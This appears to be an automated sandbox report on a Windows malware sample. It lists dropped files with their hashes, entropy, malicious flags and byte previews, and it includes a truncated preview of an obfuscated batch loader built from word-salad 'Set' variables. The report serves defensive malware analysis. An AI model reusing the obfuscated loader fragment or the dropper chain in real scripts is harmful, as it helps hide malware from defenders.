                                      Preview:....K0G4..dyUw...!-..(Y.p'I...Z..0._........SQ.!...K..G.........f....7..+p9L.V&....x.2it.....A]..S..p...k@.n..\..T.L....8.!.).d..f........<-wU..V.Fxou..!.........K..p.1....`..8.L. .(9...(LgWRn.P..mE.(-"..F..a..L..X.....4....._>V..<...U...%.o>$....p.^...0..V....+.=3U...7.[T..(...........y...h....?t......j...N....s!3H..@..a....u..)....x.u...q#.\.B.Efua.sR._nv.P.G..!O......h..........X....>..Xjr(.ch.0......\.X.c..9,..npq.k ...:`#z.M....z...@....p<z6.8Q..K..Hq.Yj....k.w..x.g....M.zY.]Lh..k...Wo.'_.......P..3@0..:.wj...:....F.>..:J....j.A.]A3...ct.k...=.e..C7y".,..Fw.9.e...-..].9~.....E.g...w4...q..^. #..<.G....9.t|Q</...T.u.m.4q..S.;.h>.......;...........+.....c;.....b7&.jN.)sW.P!T.^;_..u-....+..o..(....M....2.:.b.zN..(.vp....?.Te.,.o.e...Z.......\..@.->o..o..W....h..-..53>L.N..7.~.t.P...5.r....!.....Qli.......EK... %.;Z1..".]z..........|J.Y6rc.......R=.XV.NK.{........QY7y~...|....L..#....1v.E.....w.u~Q.GiD6..+*.V...Q.Z.B#Q.t..c. .l..D.5F
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):87040
                                      Entropy (8bit):7.997840705071926
                                      Encrypted:true
                                      SSDEEP:1536:UAsvC8aCxcatm3+Gkwp8/7yZIBgSPXGu30vCwYPl06oDDUL1MHhWGAwG87gEPFzw:UdRptE5/8/1tXGy0vCllEvUBMBoSBw
                                      MD5:CA0DA393D4AA63338EA8CB4392F905FD
                                      SHA1:4852790C68FE695368C5D742A3C7284306353850
                                      SHA-256:A5B3F558502CC0164359A016E68B5228E61057A80EF7D688515A53378A095D70
                                      SHA-512:53A977C7A90487149B024A6725BB47FA3569FA5EF74B2B75DC642A27C4788910AFE51905F1D3E79BDD34C2590CF9D5104E9028350328FB475E6E958BE81BAD04
                                      Malicious:true
                                      Preview:....$q.k...{..3...Y.`...R{...J...3.XT7BV/....wD.[.5o.x3..z...w...P9X.$...5.....41....>\........>.;.5o..=lY.@.../.c[.tk..W..W.a.3/....^eC6mM....y...GZo.E;9.2_..l."\.v...W.Z.T.2......O....l...._..Q.....`..(mw[.G9^....?.S ..M.........4.3.W...bT.^w...80...vp...zt.....{.*.x..7.k?.#....PusG.)z.....p.;4.A.~.1.....KfU.....uGt........9.I.xPA[...........]..r.....z......_{...Pl.TQ...c.B.go..p......W..Ed.....C[.....Y_~.........g.....O..W..$.k....[......L./...a.H.....l...b?....._.l.U.F..~.gS.{...|.S..._..U....M......M..BLg....1"....V)K:.....H../.(......[.lt._.ZJ...'.;\..h...goH..U...hg<&..Y....v8:.U.....L5.n...*G.B.!..r_.]...R.P@[ ..o..W...!ay.... ..1.....2.=.~..k..<...|....,...q.e<..&...'..".H...N....{.V.zy.%.H..Od.&....0g......./pf.Q..j..a...T.......#.#..XwM!..S*..J.......uR.....T...rHY.<...?.H...K.C............-nd..E.......LO^....ak8.c..p.l..................9..!$...F.0.g...;a.r.&..-...:ZC_..N.. .K.........C#.K..4..{.uG.....^....K..v....
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):55296
                                      Entropy (8bit):7.996484117380925
                                      Encrypted:true
                                      SSDEEP:1536:s38k2V9mC/FvFbVK9taQhPEHj/s9q7a26SgEJ3d0:sMk2VrFtbg99Mjkw7aNtEJ3d0
                                      MD5:05BBE1EF659B80B5C6BD343322AB16B6
                                      SHA1:FEECD557C997ADF7A0BFA3ECF5BE32DACD8C1E32
                                      SHA-256:5AD8434F5043A10855002FFC2760617AEFC9662B5CAA2C6B96AE5CAE5E88693A
                                      SHA-512:BC79E878DF1E13297FCE67607236C1264E4531DF9180EF1908D900401263A5DB12FECE84837E24AD824658E81A4842AE94C6C4593E2CA3D890ED8ED27A581261
                                      Malicious:true
                                      Preview:.|y'G....B..W..Br...<...&....Z.9...'....G*.).....]c....w#..I...bq..S>.u..M....O.Z....^.\&.. kWz.".QK...4.....b.......P.J$}.....r|..$...>c. ..z...y..3x......>.2${.. l.J.|.7.N..:.$h./....oW.p1P....}...9..=..oL.9....5.7e.J.k.K..D..j.M7.$8>Y[r.Q....|.A.A.. ~..Cl..(R.*^ru.GF....".b&&l.l9.....G..5w...mY.wyzw.jA.i....6,-.!..^.t..7..t.]S.....%.*c..8.x8.......W..&....1 mW.=...v..-.`....Q......a..s.f......3...$....... ....`G.8.5..N=..c..I).C.p.v<.p..%.$...:.%....MSC..5)x.....e_.....a .........y..m<....&....o9N.v*za.F..P.~.....(Q:.......~..!.7.@?....h......Q.B.i.k....Q..w.?z..'Z'..Z.`0.._GG.......V.._.}...Z...4|.T.....Xa...C.....=..j.x.../..L...89..Z.8.W.....?.P..~j..../.....p~h..C..`.G...Q..Y.g.....F&.n.h.:.OV=2.....n].K....$.......P.Z|+.(.L..mk...C..{B.;...A....+...FMB...........)z......b]..gh_..Fw4v.jQ.9Hp0%`K. .,.K....'"j.j.}[k...."......v%..l.."...Q....TE...B.W9....M.^qE&..).|....l..R.-............D...._.tp.F.D7O.3.#K...*k.....,..l.
                                      Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):68608
                                      Entropy (8bit):7.997498339758161
                                      Encrypted:true
                                      SSDEEP:1536:AypewPLnlLj8Gd5KdggE+wOg+Cs30qsLkGA9FsJ:3tPLlLjb5yghOg+CUEYGAY
                                      MD5:FCC2E848DA8D0BEAC27BA027AE23DC2A
                                      SHA1:D4FAE227CC35C806B7E06D85581FE7540EC4A9CA
                                      SHA-256:B2381BFDDBBB5016607B0A66DF94ADC1B4552D6BB65682D492863C4E12A67E9B
                                      SHA-512:8C80DEF9F4B0C7F37AED52E7C2BC7602DC354CFEFB0CA3E33704B07BECB1AD3FE4828BF2F5C82AD000161DBC052E584105F305D67C1DF5079D6E95B79E4F768F
                                      Malicious:true
                                      Preview:..4O.t...w..f.H:.Ln...<}.F'.(..]Xw%z...e.I^.....)!"..os.....Z.c..e...t...pRn@.^.Y......L$.}...E....=....y.. .....R...z.s@...an...K> .2f9..........[......B%j&.^.b{....).#0!.G2..V.,.i.A..\...o.V..d..sLs...w....?.r.Lr....j..2...V.*L......./..@a..<...(..[............t.....$u.....I)IR......<'./....._q@...o..b/..A......mE.J.7...^..8H.S'...W......Lo.=F{.....;E...,&5[3..Y........_.......Q.....zQ.....oxX"..\....ws......$>....b.n.Y..U..>h..2r.Liw.w...a.CHy^.}..t?.^...&t.J.2.ML.("...~...:..,b._.....zs...G.]/..&).......K$J|h...o.....<c.M......T`f..TC6d4.X..q/Tv.X.u%...&.gl.h....gCb.i..].LA....j}..4.g....99.QS..4..v..$U......po\@......<R..n..\g..u\X&.'Z...wk.TY...&.....U..F....H9..zI../.u....2.G..MT).wH.0.......`...j_...s6[.z#LE.l?..P..;T.!B...#...$..T.%.i.j.\.L<..>...>~q........<!.+Q6.5.{....{.s..........^.....9K.KL0.+L.j.RFK.,..ym..zD4.?.o.s...r....-}.W..3.|..D...{.8..B........#Q...i}.;Z~.........F..+U..c..};U..1.v.1..t..<.\H........sz....=..
                                      Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):924590
                                      Entropy (8bit):6.626218475261086
                                      Encrypted:false
                                      SSDEEP:24576:9Js7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:9C7hGOSPT/PxebaiO
                                      MD5:5E0A36A6A1E6CEB0BD42ED9DEBDE8666
                                      SHA1:6F0E0881B517206EAEF33364CA40B006038B5FE2
                                      SHA-256:1FBE941B779B8EE4152E224FE6856364B5B67BB7ECEF9F81EDE5DD7441165A3B
                                      SHA-512:7946F6A25406A15D83BD6BE6D0FA542A9D0B6C01515362FE8E318D5FCE5FC792C08AA163042DEAF2DE88EA79431175FB14C503288C12DAF6A971A9A8DDC9C80D
                                      Malicious:false
                                      Preview:A.G.....U..QQV..i......d...uS.p..7....M..E.....Q.M.QP...d....x$.}....`...t...i......d...u..I..E.A..^......j....@0.I0..U..SV.u.3.W....y.Q.>.......t....%M..@...f9X.u..8!t....t._^3.[].......U....3.BSVW..P.P..U................J....%M..O..1f.~..u.6.. t...+u..+...3...+.............f.y.4............A....E.A..E..A...R.U.E.....h...X%M..)6......M....G.3..+....D..f.x.GuB.A..E..E.SP.E.P.E.PW.}.......(....M......U..%....X%M.....3._^[..jiX.....U...<SV.M..M.W.(....}.3..E........7N.u..u.3...R.B...._.....t&..u".@...f9p.u......tB...u..u6..U...M..E.P..`....F....E..M.@....}...M...}.._^[....I.A.U..E.;..3M.....~.......3M.]...3...U..W........Q...Vj8.f...Y.u...........O..N0.w.^.._]...U..V.u.W.......O..F..G..F..G..F..G..F..a..P.M....F .O .a..P.=....._^]...3.3.@.Q..A..Q..A,...Q .Q(.U..W......uCVj(....Y.....^6...u....0.......5...v..6....I..f$..G...t..p$.w..G.^_]....7..U..VW.}...;.t.W.B6...G..F..G..F..G..F..G..F..G .F .._^]...SW..._...t.V.3.s..w...j.S.(.........u.^.OL3..t..A.9.tD..j
                                      Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):51200
                                      Entropy (8bit):7.9964112257752635
                                      Encrypted:true
                                      SSDEEP:768:BWVzlyOAYnoKD3B2049QknUNLB5f3Bc1nlHjbng01S/plADTTaQm695eVUjX:cAYnjDxTlc1lHnMDADTTagGs
                                      MD5:7C7B509C91FD9DA8DDFA9C3B5991C9EB
                                      SHA1:61FB5CF74F58BDE99C00A010E1A670BEB85FD8AD
                                      SHA-256:C6E57103AF0A2B2ACA227A2B8683B6298711454A84EF57DC91FD35D279DE9D64
                                      SHA-512:E56D32471A3C0B409A1B5A35065DB89ACE5F01928E915AB49A21242F74010C099F91F55272714F5F24C06824E5BBD0C4349DE5BFDC6E385030DEFE0D726CD06A
                                      Malicious:true
                                      Preview:op"...1..h.r...n7R.\$H.../.....g`n.-..F..$..........p,......].O....l.(E.t...r..e?$j.2>k...38.a..scG........x.......|-..0...,....2..@..W}.lj.1g...(m..iWh.#...5..0.G..&.0J.xu.+.T..._=.....".....\L.. p.u.~W.f.76..h*.......[i......u.!..e.Y..lD..D..U.....;n...k...a..nnKs...h.T..(..9.e|..C.....b4H.PM...ZE....._......I..~w?...M.......g?f.1.k...v..z..1uRm..K..x.`..C.;.i;........q_.ZQiP...\r........j.......~2P...O..<...7....vC.m=hL..B.8.l..o....|...l!..=I.[.c.q5....>...N6;.>..`h....W..p.b+.Z...]i....w.Zq....|.L.b..a.XB=.;.{.....RUw..|.4.M2..ST);...H..ke:..p...e.u.g..R...wW^b.,x...>.h...h...{Y ;..=...n.......M....(..]fJ.f._...q.X..E...D....I8d.P;^..%I...q0..4.?..E.z....<.5$.../.n.}.....L.B.}l./.x..[....8.....p"l.......P.....qDh.OY...n..R....~.x7...g..c.Lz...Y.%...5...YV<....}Y....7[.n....1..Z..........Z.:..]....8s...U..b0......K..:.....u.e..g..^.;C .D..j..O.Q,zLL"....:#...D6<.@r..*.S.....J.&..{M.c..={...#....#{:=4.}......yR.D...D&..}Wg.
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:ASCII text, with very long lines (1181), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26727
                                      Entropy (8bit):5.080719038139192
                                      Encrypted:false
                                      SSDEEP:768:6gWxHahGe0zQ/BFqRvH37se4oR6wigWw3Ow+hqY0:6gWxHdzQ/BFcXhBGet
                                      MD5:FCB66E8A2FE86AC2701377049B2B4C1B
                                      SHA1:23497AC06DACAC5AADB4F1BF1F6D7E466423438B
                                      SHA-256:518077F1096F3975B3DF1DEA86F0BE43D57E8A0BE3C44E8C67E4864A593683A2
                                      SHA-512:DE3EFB8A957E309DCE4D8ACA89F09904EE30533528BEEC6CEE10D00D6E324868BBB1C06647DCEDB0F093C68B83A3C2E7FB83A0F7520A7E0937A6D182573EBB9E
                                      Malicious:false
                                      Preview:Set Membrane=w..ZVSenegal-Scary-Tropical-Maintaining-Might-Painful-Mailed-Need-Harm-..rKpmCons-Cached-Justice-Sku-..GkProved-..IfsAssuming-Guys-..lxEYGranny-Stronger-Mud-Terrorists-Unity-..bIYCompeting-Creator-Wal-..EpUdPools-Creatures-Twelve-Tiger-Filename-Construction-..agfSanta-Throws-Hans-Racks-Reduction-..jiKPhase-Andrews-Pairs-Gaps-Boutique-Buddy-Complexity-..Set Tactics=4..TnRVAmendments-Protection-Consumers-Typical-Stakeholders-Pictures-Ribbon-Pole-Golden-..cQMortality-Fantastic-Disposal-Compatibility-Inn-..UVOpinion-Customer-..fXfAged-Experience-Included-Affair-According-Ht-..WKrHAdapters-..PHcDowntown-Compiler-Never-..qFwtBathrooms-Weird-Meters-Mario-Pulling-Internal-Artists-Frequent-..YPBiFelt-Jewish-Greetings-Nb-Smart-..Set Rally=g..SlRespondents-Features-Fotos-Mime-Train-Lamb-Electric-Brandon-..tlgPoster-Exists-Considering-Mt-Hosts-Experiment-..nkAllen-Feedback-Awesome-Poems-Clients-So-Veterinary-..ISdBreeds-Mount-Year-Hosts-Workshops-Finish-Incomplete-..KciBKnown-Robust-D
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:ASCII text, with very long lines (1181), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26727
                                      Entropy (8bit):5.080719038139192
                                      Encrypted:false
                                      SSDEEP:768:6gWxHahGe0zQ/BFqRvH37se4oR6wigWw3Ow+hqY0:6gWxHdzQ/BFcXhBGet
                                      MD5:FCB66E8A2FE86AC2701377049B2B4C1B
                                      SHA1:23497AC06DACAC5AADB4F1BF1F6D7E466423438B
                                      SHA-256:518077F1096F3975B3DF1DEA86F0BE43D57E8A0BE3C44E8C67E4864A593683A2
                                      SHA-512:DE3EFB8A957E309DCE4D8ACA89F09904EE30533528BEEC6CEE10D00D6E324868BBB1C06647DCEDB0F093C68B83A3C2E7FB83A0F7520A7E0937A6D182573EBB9E
                                      Malicious:false
                                      Preview:Set Membrane=w..ZVSenegal-Scary-Tropical-Maintaining-Might-Painful-Mailed-Need-Harm-..rKpmCons-Cached-Justice-Sku-..GkProved-..IfsAssuming-Guys-..lxEYGranny-Stronger-Mud-Terrorists-Unity-..bIYCompeting-Creator-Wal-..EpUdPools-Creatures-Twelve-Tiger-Filename-Construction-..agfSanta-Throws-Hans-Racks-Reduction-..jiKPhase-Andrews-Pairs-Gaps-Boutique-Buddy-Complexity-..Set Tactics=4..TnRVAmendments-Protection-Consumers-Typical-Stakeholders-Pictures-Ribbon-Pole-Golden-..cQMortality-Fantastic-Disposal-Compatibility-Inn-..UVOpinion-Customer-..fXfAged-Experience-Included-Affair-According-Ht-..WKrHAdapters-..PHcDowntown-Compiler-Never-..qFwtBathrooms-Weird-Meters-Mario-Pulling-Internal-Artists-Frequent-..YPBiFelt-Jewish-Greetings-Nb-Smart-..Set Rally=g..SlRespondents-Features-Fotos-Mime-Train-Lamb-Electric-Brandon-..tlgPoster-Exists-Considering-Mt-Hosts-Experiment-..nkAllen-Feedback-Awesome-Poems-Clients-So-Veterinary-..ISdBreeds-Mount-Year-Hosts-Workshops-Finish-Incomplete-..KciBKnown-Robust-D
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):77824
                                      Entropy (8bit):7.997576482212188
                                      Encrypted:true
                                      SSDEEP:1536:aGYvJmiIO8b7UwXDFgHV5PUvYcal2Ww1OTeYmvtQ7cKcm4Yayt9+2bIv:aGYjI/fDFgXx6WwpbmxmYftTkv
                                      MD5:991928C926AB0EB5B3BD3041F7F9EE75
                                      SHA1:52044452BC9241D53B652A99AEE92E8D2F7663A1
                                      SHA-256:3E3D903B757EFE8D442782AC96E3B9C916C849D1F88C826AD667E1CDAD3FCB93
                                      SHA-512:367E8E8303DC731659A1AA8868E9857FFD3D850DB0DDA7F316F8E391D176F3B1822FAC7F591C09CCC5E9DAB1A2C66F61CA97375B1698DD79996BE381CFECB06E
                                      Malicious:true
                                      Preview:3R)..?......u..?SC.RB.-.....U...u.8...A..;..[.%c......W.j.:...C.......H....&.H.m.}..6..<....v..:..t..{...G..C......^{*l.h..L...\.....).,<.\c..7..2:.gAIN .&......Cg..A...2>;.$a.....qlH6d....n..^|.f-.od.4..>..n7<.>Vu........ ...Q...$Bi7E(&.<..2.....HXA...#qa.S..........l.?...C....?j...E..:.g)w(.....Jo..O.P..y..^._%.`...q.go.......j.....b>.j....e.|.4.4oy;....~*0..x........ ..b+r.K!r.!V....,..e.......0..y.Y.4.%.......Wv.m.#\..|...u1.....2.....EtP.t....{%qOwN.D("......x$zG..n..N.(......v...nc...z...:eq...%.9....,5..g..g]o?Z.}.h...76.n.....=..8S7.6......2.......a..i.`e.8.P PY!.Ff2...G..<....|.I..m...".Y.:...K.h..Wg:..$pho?....xa\.n.Zp).cg.....u,"3J.*.g'...2]E..e...Y-...{$....u.-w.+D...Nas........j..o..j.Y~M0.`.!.`.V._...N..."`z;....W"b.B..Je..Z.......;.6.....&i.=]..W...F.^.|...+o/..r...wp..3..wM.?8q....S..s.S1w.:.W....B.O.*.]3....a....bt..|Ic c.Z......).\?.......eWG#ni........E@W..L.h.#.2..om...6D<...S{.b+`.LDb.+...H.E.eXx.W.Y.......2k.
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:OpenPGP Public Key
                                      Category:dropped
                                      Size (bytes):74752
                                      Entropy (8bit):7.997683653805352
                                      Encrypted:true
                                      SSDEEP:1536:2lfxwqJC7Efj6ArRDI+SR8O07A3XCCthP9Wpan1d8r7u/EklKW+RaPe6yW+hBQAs:2H7xIPRN3HDnPQa1+/u/DKWBPShbu3nl
                                      MD5:7AF70F6EC6FE162EE7A0C0B86077DC17
                                      SHA1:8D4DF6CC535EFA001F70BD8C07FCD9FFB1B11EB4
                                      SHA-256:D6F7FBCE77B113E19D4B8CCA39EA9868D62F99887A427D8A835A86C489AE2C18
                                      SHA-512:C023787AB0CBDBA3CD86D6727AB9A21A06A131FAD288C817E4B06BC79002F07238109294FEFF6442A9F1993017DAE5A3302D89DC3EEEDC51FFE0711EAF90DD7D
                                      Malicious:true
                                      Preview:....._..(...]]..."P'....X[.;n.@........9s.,0..g.....t.y..|.R....: ?LM....!r&-......I..2.&/d.^G..'.7.../G..<...c@......o...D.?.....I..Dw.>....J.e.. 1........G....s.:...#.o..4..].JX.E..wV.%.3....-y..Z~FL.B,..W..r.;....KP......].+...:.I%...aF.'V..NNNC.1.o!F.....zhPT[.n.-......Q#A.v+.h....{%.........s..G.o...|D!i.B..{.?.L.-c+.{.+..g....]....O....c..]Q.s..F:uL7'|..d.V.....#.~b7...C.51....i?..#..:pG$D...kFLE..x.7S]...U......s>*s._=d..2b.R.1.`@.(. ..Y.'.#.6.....LF......o/..1Dy.....$t..S...."X(.V..mhm`.Z/.o..).-;..P..C.....Dx..a.f....W1..;....L.....6...;-S...O.&o.6\rt.t.>jn......s.n.....*Q....8.m.FR.t......1....V.k...%G4_]....d.ld.U@{..v2L.....{.O...%.b9.v*{.F..v..z.2...f.P(.c..D...c.pY...X.f..S...<....U=._4...H...|..x...N.Eny=.%....r.*C...ro(..9...c...........H.).$K..3PIP.....&..o.g..5#wP^.....Oy. ...."...DQ.5.............(.T..'......4.^..r..".l..W.x......?.......@T8..YY=......q...(.s. A...."!......G.....r..H[....{....[...N.D1...
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):92160
                                      Entropy (8bit):7.9980473668055865
                                      Encrypted:true
                                      SSDEEP:1536:Olz5p2z58J/2NdMw+YdMqW1OmpMI65W54YMsr5qk0yvqdoSLb96a4XCKjngyK:Qz54lggviqOpMI8Waxsr5qicoSLxD4Xo
                                      MD5:B69EC139C5B8D39F27D81D1E99D6E37E
                                      SHA1:87E80B8199F799A3F8F26FEC6073A7DECA7687CD
                                      SHA-256:A09482954B2F5417538A52A21CCAF43B4DA7B6A84D261F0F8D8AF69EFD52DCAB
                                      SHA-512:4A3EBC82B013C8382C9FB24759F25441BDA7A48CE4503DCFCB2978BD0C6433144B38DB6625FFE7393A43453580AA56F713ABCA4F563CA78EF6AB4B1756DCF2B4
                                      Malicious:true
                                      Preview:!.|3..U.p...N............+..*H^...\|..........K.u 1.so.@C.1m..c..W3...R.j.[.*..4.jX....l>$.....C..z}wS.<..q..C..(.M.T|..+g.E.%.u....E.zsW..Q[.....x%.....K...:+.4..C.8.......N..A..(\.N........~..r9.....D9...\0@.d>F~E.8.%.}Q.iJ|eM.....4.L.l.y...?.t..[....l..Q..gv4T_.F..2...x.......J.z..rVO....I..%....t.v:|..V.".}IDe..A.......T.............v.....L2.3.xj..$v7..:..p..2..f.M...^.5n)l...q...7.v.2..>s!/l.p....%.y...D.sd".R..h...5'!^........q..9O.....6.~...hI.0$.x......a.uek?...W..ve...y..7.}^...5B...eT..a.i...4.N..1....N.M.r".-o.w..54.d.....%.._.J=..y..5.A..v..:.#;....X...Qf...W.C_.l.'n.c}.k..v..i{-.LH..D..X.....k-p30..b.l-.......e.yBm.#B0..RZ..&....{......x.Y.}..VR....q..X.7@.;7.L..mM;.a xJ...u(..xh...rH6..............X.qc.....U%..;......2!.Ez|.E$I8B....n..f.{.Csd~.{...Aq!.>.....6.6.gJq.@.m,:..N.<......"6C...\.e...{..)T....[..JMu..2..G.....wa...Rg.......5.F.Z.....$.f......-.....6...K.[..s.n.g!,H8C.....^..'Wk.K.&.h@TY6..f.N$..a....W.(....}0.2..
                                      Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):83968
                                      Entropy (8bit):7.99777953585341
                                      Encrypted:true
                                      SSDEEP:1536:0hrgsLjJ2daNKUtnGZUs1bMOLBCSzfMA0x6S3gWlETHnJHL:0x3LjFKUtnyUsVFBFzD0xXgWSJHL
                                      MD5:AC10591ABC6E8218601573329D394545
                                      SHA1:7AD13438209AB213DABCC5274425A75C8BB63B27
                                      SHA-256:E720BCD9B3FB4CD02E1F7C16CCDBF9017E1231F390976C9BC6592E3E878F630A
                                      SHA-512:34FC9287C42FE1626DD1150E49D172166C4B9E47287BB2D56994AC5B1F237E938CB332F3E0B0C94408E2473AAF6B29F8E7731DE9FBD9D636320FB7238A6B2A4D
                                      Malicious:true
                                      Preview:.....w..d|b\.M.IC...B<....O..>.[......4Ksq`...?...g.H.....'._&j..t>..%9....o..X......2]}.w(..n.K...=...o-E.y..e...^}..N..9M.w.*..yI...5.9|@#..n.&....59.&>..s...G2.....PDCA+3.@.8P....D....g...>%o....d.....4X.:f0S.....9..}~....y1N....(R.L..D.._O.m.......{.s7......m......H..r....4f..%.....e.....Um=c2..<3.T.D.>`.0...P...k.W<R|..JSc.3..a......+&..q+.c...+)z.........Q8...L1..o1.9....6.(..c|.=..I.K..9qQd.O.7...f....M.gIiVA..~.....tq..q.f. .7X...qC.YR.~...a..l..C........gFx1.wn_.*f.o.....`!...BT......;r.n.....`:B(..92)..4o@..6..{..:....Q.d...E.q.YA.oj.fy.1D...4.&...oO..<..l@. "....[`..?..dv.......i..i2..a...6#..<.d.4.40p.+j....8J(.pz>..2U.2S.A.if.F<|.4z.].#.q.JS...C.N.......w...{.......~.#.o...F.&..g?z..||..wY..W..{L.m`T.......%..Slgzd.a2......TC..]...tf_.x.........|r.!....tFO..!...m........\.../.F...\.h..(....... .w..y...g..{.......t.......K.C...K.^.Pu...G.ce........[wS.$...#..mb.}..._....e..W...a9s.P...^i....v.......:J..5.....(..j.gC..9d:o...Yy.....
                                      Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):82944
                                      Entropy (8bit):7.997454439778383
                                      Encrypted:true
                                      SSDEEP:1536:pNkbqY2FDb8R4MjFZwtLh5H5oeuPyXFvaqRhBT5z3QqVl/8W4zsZeQJ:pNk32FDgXEhZ5VzViwJ5zAqz/8WNcQJ
                                      MD5:D1DA7B87F186D2F06637FDB6851E4043
                                      SHA1:D84CD866C1F50D57FCA2A0000C9E5231229866D1
                                      SHA-256:B91FF890AF60C6AAD4BB50FB9ED5A8593A8ED0FF26568732A130BB4DA22BAF09
                                      SHA-512:697608D39B19C2B9A617102A74377A438BF1D53430DC09A225D98D59AB3A65B807E12F84D464F335190047624CDDB1452088B89FED15BB667C875FEAA8BED1F8
                                      Malicious:true
                                      Preview:.W.;...O...._....y...i..7/1...s...C...y.i..3....{{..Z..gky}%n......h.l...v.]#y*[6.7.....(........8.#G_q5.]+...%..G..#......d(.h)K).%.}...z..y...2.....^.x5R...`.6\......-.G?}R....d...q.q......p.0...=O...Pmt.7..HYHy).3..V..h.....u#.n9..W.....Z/F=i.KOHfb......f@..t..F........!K...Wjd.pQ..6w....B....9.E.u..#.e....2..^...:......=....c..w/..8..v.,~zv..TR.b......+...).C]...=.h.@.8.[.......>....te]...8...f0h(...6.hj=.+.vOh..e.{..5K.9...F..'a.Z0..z...!4.t..+....UG...|..0>.I'g..E%...k.(.Q...4A.()..o1Vx$...W..r..nL....G..<.G.......i./....j........Q..........].4B.8............Yp..+........dL+t-X.j....dO.&.#$.Q.lK...'Y.D...P.rK.............0....x8".QT.b....u..W..f.R.ZXV^c.7..G{...U..I(.<@..K.@..J.Ts.....(nU...0.p...]..>..e..p..B.I39.$...X.ODI..O.~;".J..Ck!...,.R...1.7..|$...v..I!...af.............^O5.82.Pe..^.>....6.i...3;...........?_....h.......Z..w...'..$y.%I.".9W.......gF.]...:........*=,|.N]..{l ... ...k.4K.=.f.q..&..:^K......n.p....B...OX.JAr.|.....
                                      Process:C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1151988
                                      Entropy (8bit):7.977544256260055
                                      Encrypted:false
                                      SSDEEP:24576:jk8k+VnD9c/rJH6DguRRE0SBpQKkRS78imlEQ6dDyzKdKXnJX8cmegcEipn/:lkMnEa5dnZS78iokGRnJV7n/
                                      MD5:B487B5B51436B42576D60A1FE58F8399
                                      SHA1:4FF23FB37AABA96AC114FC54B397A902E4D9D650
                                      SHA-256:440FCA4D671E78345ED1763F7904174EFFDA3ECD567D7E20224E5910028B83C0
                                      SHA-512:DE6974616095ECDE0A222099D74FD08B307EB1213105053C14638A96FCB526C68FA53645D0B9359E1293B42AF45B01226AF7A373AC3A64709632C5D093C19EE5
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 62%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...V...B...8............@......................................@.................................4........@..r............s..h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc...r....@......................@..@.reloc..2............:..............@..B................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):947288
                                      Entropy (8bit):6.630612696399572
                                      Encrypted:false
                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                      MD5:62D09F076E6E0240548C2F837536A46A
                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):88064
                                      Entropy (8bit):7.9980376794357575
                                      Encrypted:true
                                      SSDEEP:1536:Ad6ROLk6LJBOGir/67SrmGIQvugEx1Aa2RQkHTnwBPFe0nZevuy461Pln:+evWOGir/MSrIQvtra2J6PFe0ZB6Xn
                                      MD5:BACA9A04DD19F20199C21C2EBF0374AA
                                      SHA1:5DF76C54FD5F02DB7DF46FB38EF41449430545D0
                                      SHA-256:4325FAC47DF15F794B41742445329E5028C09B85F56696B1B590B0E8C5FDEC09
                                      SHA-512:39B10B8A6D9D55CACC30F8424E468F133EB599A29F1BE3CE20563DDDE0192FCDFAE891BEEE9F64FEF074A2D4113EEA7F14BDBBCD662398F36CD8B5CB037C5973
                                      Malicious:true
